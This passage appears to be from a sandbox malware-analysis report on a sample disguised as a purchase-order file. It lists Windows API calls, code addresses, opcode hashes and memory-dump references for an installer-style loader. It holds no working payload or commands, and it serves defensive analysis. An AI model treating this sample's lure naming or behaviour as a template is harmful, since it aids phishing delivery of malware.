                                                                      • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                      • wsprintfW.USER32 ref: 00402FEA
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                      • API String ID: 1451636040-1158693248
                                                                      • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                      • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                                      • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                      • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                                      APIs
                                                                        • Part of subcall function 6FBB12BB: GlobalAlloc.KERNELBASE(00000040,?,6FBB12DB,?,6FBB137F,00000019,6FBB11CA,-000000A0), ref: 6FBB12C5
                                                                      • GlobalFree.KERNEL32(?), ref: 6FBB2743
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB2778
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 4b3c0c186abe939aeede36e76104a4575efbaea4f2ab6ca720ddac5a18c0bade
                                                                      • Instruction ID: 1edc3eb1306b712a7e25371929390070f8a70362226a6f133cd9de7d8c42d6f9
                                                                      • Opcode Fuzzy Hash: 4b3c0c186abe939aeede36e76104a4575efbaea4f2ab6ca720ddac5a18c0bade
                                                                      • Instruction Fuzzy Hash: 3C31BE31504981EFCB178F6AEA94C7E77B6FB87314354452DF10187260CF30AC268B66
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                      • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                                      • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                      • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                      • wsprintfW.USER32 ref: 00404F58
                                                                      • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$H/B
                                                                      • API String ID: 3540041739-2222257793
                                                                      • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                      • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                                      • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                      • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 2b0ae5e2875d78677f1ac7c5512af5d5f58bda69f54d000f7b082bc93dc56297
                                                                      • Instruction ID: dc3869c944cdd5e6f829e1cabc6d3846addc555e58b6d4e086ca63b386474eeb
                                                                      • Opcode Fuzzy Hash: 2b0ae5e2875d78677f1ac7c5512af5d5f58bda69f54d000f7b082bc93dc56297
                                                                      • Instruction Fuzzy Hash: FE51E23AD041D8AA8B209FB8F5906FEBBB5EF41314F0C925FD510A7250EF71BA468791
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB25C2
                                                                        • Part of subcall function 6FBB12CC: lstrcpynW.KERNEL32(00000000,?,6FBB137F,00000019,6FBB11CA,-000000A0), ref: 6FBB12DC
                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6FBB2548
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBB2563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 4216380887-0
                                                                      • Opcode ID: fa387f6e20298e5c56fb5272584f369f0a24b67c7ba821e12eaf2849dfcdb5a1
                                                                      • Instruction ID: 04868185eaa9b53e615a42c7074af4f7085c86b0035cf32be4ae05c92c02200e
                                                                      • Opcode Fuzzy Hash: fa387f6e20298e5c56fb5272584f369f0a24b67c7ba821e12eaf2849dfcdb5a1
                                                                      • Instruction Fuzzy Hash: 8941D3B1008785EFD715EF29F890ABA77F8FB46310F008A1EE94687680EF70A545CB61
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                      • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                                      • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                      • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401E56
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                      • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                                      • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                      • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBB22D8,?,00000808), ref: 6FBB16D5
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBB22D8,?,00000808), ref: 6FBB16DC
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBB22D8,?,00000808), ref: 6FBB16F0
                                                                      • GetProcAddress.KERNEL32(6FBB22D8,00000000), ref: 6FBB16F7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB1700
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                      • String ID:
                                                                      • API String ID: 1148316912-0
                                                                      • Opcode ID: 0952fc3565132ce8af242303ea0933124154f2a11166ad688625c22fa13b89da
                                                                      • Instruction ID: 36540eb593f7b615d9fc5c9455c8a7cc41fc2fb3bf3548f53c72f2d65d077e82
                                                                      • Opcode Fuzzy Hash: 0952fc3565132ce8af242303ea0933124154f2a11166ad688625c22fa13b89da
                                                                      • Instruction Fuzzy Hash: CBF03772106538BFDA201AA79C4CC9B7E9CFF8B2F5B110315F718D219089614C12D7F1
                                                                      APIs
                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 0040600A
                                                                      • CharNextW.USER32(00000000), ref: 0040600F
                                                                      • CharNextW.USER32(00000000), ref: 00406027
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp, xrefs: 00405FFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp
                                                                      • API String ID: 3213498283-766773280
                                                                      • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                      • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                                      • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                      • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-823278215
                                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                      • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                      • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBB1171
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBB11E3
                                                                      • GlobalFree.KERNEL32 ref: 6FBB124A
                                                                      • GlobalFree.KERNEL32(?), ref: 6FBB129B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB12B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: d3a81e1583e05128229f48100c75f271d2e80731654fc3337cea3f00fd909433
                                                                      • Instruction ID: 5e10834b044982da06dfa0468feb4c84c46c3166afe93159b2e1c04767e9a558
                                                                      • Opcode Fuzzy Hash: d3a81e1583e05128229f48100c75f271d2e80731654fc3337cea3f00fd909433
                                                                      • Instruction Fuzzy Hash: F5519DB5900745DFDB00DF69E984A7A77B8FB0A324B48412EF905DB250EF34E922CB55
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(005BE438), ref: 00401C10
                                                                      • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: 8[$Call
                                                                      • API String ID: 3394109436-749019143
                                                                      • Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                      • Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
                                                                      • Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                      • Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dll), ref: 0040269A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
